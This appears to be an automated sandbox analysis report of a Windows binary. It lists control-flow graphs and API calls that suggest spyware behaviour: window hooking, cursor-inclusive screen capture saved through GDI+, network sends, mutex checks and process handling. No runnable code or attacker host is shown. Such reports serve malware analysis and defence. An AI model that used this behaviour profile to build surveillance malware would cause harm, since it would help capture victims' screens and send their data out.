40504e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6267->6268 6269 410cd2 13 API calls 6268->6269 6270 405077 CloseHandle 6269->6270 6270->6271 6272 40508e 6270->6272 6271->5671 6272->6271 6273 405094 UnhookWindowsHookEx 6272->6273 6273->6271 6274->6240 6276 402422 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ send 6275->6276 6277 402444 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6275->6277 6278 40248f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6276->6278 6279 402fc1 4 API calls 6277->6279 6278->6255 6280 402466 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ send ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6279->6280 6280->6278 6282 4021be ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 6281->6282 6283 4021d4 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6282->6283 6284 40220b ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 6282->6284 6285 402fc1 4 API calls 6283->6285 6286 402217 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6284->6286 6287 4021f6 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6285->6287 6304 402370 strncmp 6286->6304 6287->6286 6290 402360 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6290->6258 6291 402239 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6292 402250 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 6291->6292 6293 402352 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6291->6293 6294 402272 6 API calls 6292->6294 6295 402266 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 6292->6295 6293->6290 6296 4022c4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 6294->6296 6297 4022dc ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ CreateEventA CreateThread WaitForSingleObject CloseHandle 6294->6297 6295->6294 6299 4022d7 6296->6299 6298 402318 ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6297->6298 6298->6290 6298->6299 6299->6282 6299->6298 6301 40265b 6300->6301 6302 4026ce 6300->6302 6301->6302 6303 402668 7 API calls 6301->6303 6302->6262 6303->6302 6305 40222e 6304->6305 6305->6290 6305->6291 6308 40fc73 __EH_prolog 6306->6308 6307 40fcac 6309 401289 6 API calls 6307->6309 6308->6307 6310 40fc9a GdiplusStartup 6308->6310 6311 40fcba 6309->6311 6310->6307 6312 4112fa 7 API calls 6311->6312 6313 40fcc7 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 6312->6313 6314 401289 6 API calls 6313->6314 6315 40fcdb ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6314->6315 6316 408137 37 API calls 6315->6316 6317 40fcf2 7 API calls 6316->6317 6318 40fd71 6317->6318 6319 40fdcb 10 API calls 6318->6319 6321 401289 6 API calls 6318->6321 6330 40fdc2 Sleep 6318->6330 6380 40fa6e ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 6319->6380 6324 40fda4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 6321->6324 6322 40feaa 6323 401289 6 API calls 6322->6323 6325 401289 6 API calls 6322->6325 6326 40fee8 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 6323->6326 6327 411b14 43 API calls 6324->6327 6328 40feba ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 6325->6328 6329 40fed0 Sleep 6326->6329 6327->6318 6328->6329 6329->6318 6330->6318 6332 401289 6 API calls 6331->6332 6333 401871 8 API calls 6332->6333 6335 40ab86 3 API calls 6334->6335 6336 409b7b 6335->6336 6337 409b8a OpenMutexA 6336->6337 6344 409b82 6336->6344 6338 409ba1 CloseHandle ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6337->6338 6339 409c02 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@ 6337->6339 6341 40a825 3 API calls 6338->6341 6340 411650 GetCurrentProcess 6339->6340 6342 409c14 6340->6342 6343 409bc2 6341->6343 6346 409c73 7 API calls 6342->6346 6347 409c18 7 API calls 6342->6347 6343->6344 6345 409bc9 OpenProcess ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6343->6345 6348 40acb8 17 API calls 6345->6348 6349 409ccc ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG GetModuleHandleA ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 6346->6349 6347->6349 6350 409bee 6348->6350 6351 40ede9 12 API calls 6349->6351 6450 409d3f 6350->6450 6353 409cfd 6351->6353 6354 409d04 Sleep 6353->6354 6355 409d1f CloseHandle 6353->6355 6357 409d3f 39 API calls 6354->6357 6356 409d2e ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 6355->6356 6356->6344 6358 409d1a 6357->6358 6358->6356 6360 40a053 6359->6360 6361 409fce ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6359->6361 6364 40a065 Sleep 6360->6364 6371 40a04b 6360->6371 6362 40a9ef 3 API calls 6361->6362 6363 40a020 6362->6363 6367 40a027 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 6363->6367 6368 40a039 ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 6363->6368 6365 40a079 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 6364->6365 6366 40a0ab ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6364->6366 6369 407112 30 API calls 6365->6369 6370 40ac55 13 API calls 6366->6370 6367->6368 6368->6360 6368->6371 6372 40a0a8 6369->6372 6370->6360 6372->6366 6454 4124fb RegisterClassExA 6373->6454 6376 4124d4 GetMessageA 6377 4124f7 6376->6377 6378 4124da TranslateMessage DispatchMessageA 6376->6378 6378->6376 6408 40f0df CreateDCA CreateCompatibleDC GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 6380->6408 6383 40fad4 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6385 40faee 6383->6385 6384 40fabb LoadLibraryA GetProcAddress 6384->6383 6430 40f7de 6385->6430 6391 40fb1f 6392 401289 6 API calls 6391->6392 6393 40fb2b ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6392->6393 6394 40fc28 6393->6394 6395 40fb3c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 6393->6395 6447 40f83d GdipDisposeImage 6394->6447 6397 411980 6 API calls 6395->6397 6399 40fb5c 6397->6399 6398 40fc30 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 6398->6322 6400 40fb66 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ DeleteFileW ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6399->6400 6401 40fc1f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6399->6401 6402 402ebe 6400->6402 6401->6394 6403 40fb98 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6402->6403 6404 402fc1 4 API calls 6403->6404 6405 40fbbb ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 6404->6405 6406 4119ef 7 API calls 6405->6406 6407 40fc0a ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6406->6407 6407->6401 6409 40f131 DeleteDC DeleteDC DeleteObject 6408->6409 6410 40f14e SelectObject 6408->6410 6411 40f35e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6409->6411 6412 40f17b StretchBlt 6410->6412 6413 40f15c DeleteDC DeleteDC DeleteObject 6410->6413 6414 40f446 6411->6414 6415 40f1b9 6412->6415 6416 40f19a DeleteDC DeleteDC DeleteObject 6412->6416 6413->6411 6414->6383 6414->6384 6417 40f1c4 GetCursorInfo 6415->6417 6418 40f20e GetObjectA 6415->6418 6416->6411 6417->6418 6419 40f1d9 GetIconInfo 6417->6419 6420 40f223 DeleteDC DeleteDC DeleteObject 6418->6420 6423 40f240 LocalAlloc 6418->6423 6419->6418 6421 40f1ea DeleteObject DeleteObject DrawIcon 6419->6421 6420->6411 6421->6418 6424 40f2c2 GlobalAlloc 6423->6424 6425 40f2ba 6423->6425 6426 40f2f1 DeleteDC DeleteDC DeleteObject 6424->6426 6427 40f324 GetDIBits 6424->6427 6425->6424 6426->6411 6428 40f372 15 API calls 6427->6428 6429 40f33d DeleteDC DeleteDC DeleteObject GlobalFree 6427->6429 6428->6414 6429->6411 6431 40f802 GdipLoadImageFromStream 6430->6431 6432 40f7fb GdipLoadImageFromStreamICM 6430->6432 6433 40f807 6431->6433 6432->6433 6434 40f44e 6433->6434 6448 40f4e7 GdipGetImageEncodersSize 6434->6448 6436 40f46b 6437 40f482 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 6436->6437 6438 40f472 malloc 6436->6438 6445 40fc45 GdipSaveImageToFile 6437->6445 6438->6437 6439 40f487 6438->6439 6449 40f4f7 GdipGetImageEncoders 6439->6449 6441 40f493 6443 40f4a1 wcscmp 6441->6443 6444 40f4c0 free 6441->6444 6443->6441 6443->6444 6444->6437 6446 40fc64 6445->6446 6446->6391 6447->6398 6448->6436 6449->6441 6451 409d43 OpenProcess WaitForSingleObject CloseHandle 6450->6451 6451->6451 6452 409d6e 6451->6452 6452->6451 6453 409b4e 65 API calls 6452->6453 6453->6452 6455 412467 ExtractIconA lstrcpynA Shell_NotifyIconA 6454->6455 6456 41254c CreateWindowExA 6454->6456 6455->6376 6456->6455 6457 412566 GetLastError 6456->6457 6457->6455

                                                Executed Functions

                                                Function 0040845A Relevance: 235.4, APIs: 122, Strings: 12, Instructions: 875synchronizationthreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 40845a-4084bc call 408f23 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 411550 call 409671 call 401ad8 9 4084be-4084c4 0->9 10 4084e0-4084e2 9->10 11 4084c6-4084c8 9->11 14 4084e5-4084e7 10->14 12 4084ca-4084d2 11->12 13 4084dc-4084de 11->13 12->10 17 4084d4-4084da 12->17 13->14 15 408548-4085ee call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 call 401289 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z call 401289 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 14->15 16 4084e9-408543 ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 14->16 29 4085f0-408614 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40a825 15->29 30 408639-408652 OpenMutexA 15->30 22 408f1c-408f20 16->22 17->9 17->13 29->30 37 408616-408636 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40acb8 call 409d77 29->37 31 408654-408663 WaitForSingleObject CloseHandle 30->31 32 408669-40868a ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40a825 30->32 31->32 39 4086a7-4086dc call 401289 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ CreateMutexA GetLastError 32->39 40 40868c-4086a4 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40acb8 32->40 37->30 48 4086e6-408742 call 409008 call 401000 GetModuleFileNameW call 411650 call 40a87f ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 39->48 49 4086de-4086e1 39->49 40->39 59 408744-408749 48->59 60 40874b 48->60 50 408f11-408f1a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 49->50 50->22 61 408750-408762 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 59->61 60->61 62 408764-408766 61->62 63 40876b-40876e 61->63 62->63 64 408770-408783 call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 63->64 65 4087db-4087ee call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 63->65 64->65 73 408785-40878b 64->73 71 4087f0 call 409619 65->71 72 4087f5-4088b9 call 401289 call 4113e6 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 65->72 71->72 101 40894f-408952 72->101 102 4088bf-4088f1 call 401289 call 4113e6 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ wcslen ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 72->102 73->65 76 40878d-408793 73->76 78 408795-4087ae ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 76->78 79 4087b7-4087d4 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40a7dc 76->79 78->65 81 4087b0-4087b5 call 403132 78->81 79->65 88 4087d6 call 40300f 79->88 81->65 88->65 103 408ad3-408b38 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ * 2 call 40a9ef ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z 101->103 104 408958-408963 101->104 102->101 120 4088f3-408949 call 401289 call 4113e6 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 408137 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 102->120 117 408b3e-408b64 call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi 103->117 106 408a03-408a0a ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z 104->106 107 408969-408a01 call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 call 4113e6 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 401289 call 4113e6 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 4072e6 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 104->107 111 408a10-408aa3 ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ ??2@YAPAXI@Z ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ wcscpy ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40ac55 call 4127a4 call 401289 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 106->111 107->111 111->117 145 408aa9-408aca call 401289 call 4112fa call 4090db 111->145 129 408b66-408b68 117->129 130 408b6a-408b6c 117->130 120->101 134 408b6f-408b7f call 412670 CreateThread 129->134 135 408b81-408bd8 call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z call 401289 call 4113e6 ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 130->135 136 408b6e 130->136 134->135 164 408c33-408ce4 call 401289 call 4113e6 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 408137 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 call 401289 call 4113e6 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 135->164 165 408bda-408c2e call 401289 call 4113e6 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 408137 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 135->165 136->134 145->117 171 408acc 145->171 187 408ce7-408d22 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi 164->187 165->187 171->103 193 408d42-408d56 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z call 4044ed 187->193 194 408d24-408d25 187->194 197 408d5b-408d6f call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 193->197 196 408d27-408d40 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z call 4045a0 194->196 194->197 196->197 203 408d71-408da4 ??2@YAPAXI@Z call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ CreateThread 197->203 204 408da6-408dba call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 197->204 203->204 209 408df2-408e06 call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 204->209 210 408dbc-408df0 ??2@YAPAXI@Z call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ CreateThread 204->210 215 408e62-408e76 call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 209->215 216 408e08-408e60 call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 4080e4 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ CreateThread 209->216 210->209 221 408eb0-408ed6 call 410dfa ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 215->221 222 408e78-408eaf call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 406df2 215->222 216->215 231 408ed8 221->231 232 408edb-408ee1 221->232 222->221 231->232 235 408ee3-408eed CreateThread 232->235 236 408eef-408ef5 232->236 235->236 237 408f03-408f0b call 40bb79 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 236->237 238 408ef7-408f01 CreateThread 236->238 237->50 238->237
                                                APIs
                                                  • Part of subcall function 00408F23: malloc.MSVCRT ref: 00408F46
                                                  • Part of subcall function 00408F23: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00408F72
                                                  • Part of subcall function 00408F23: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408F7E
                                                  • Part of subcall function 00408F23: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408F87
                                                  • Part of subcall function 00408F23: malloc.MSVCRT ref: 00408F98
                                                  • Part of subcall function 00408F23: free.MSVCRT ref: 00408FE3
                                                  • Part of subcall function 00408F23: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408FF1
                                                  • Part of subcall function 00408F23: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408FFA
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 0040847E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040848D
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
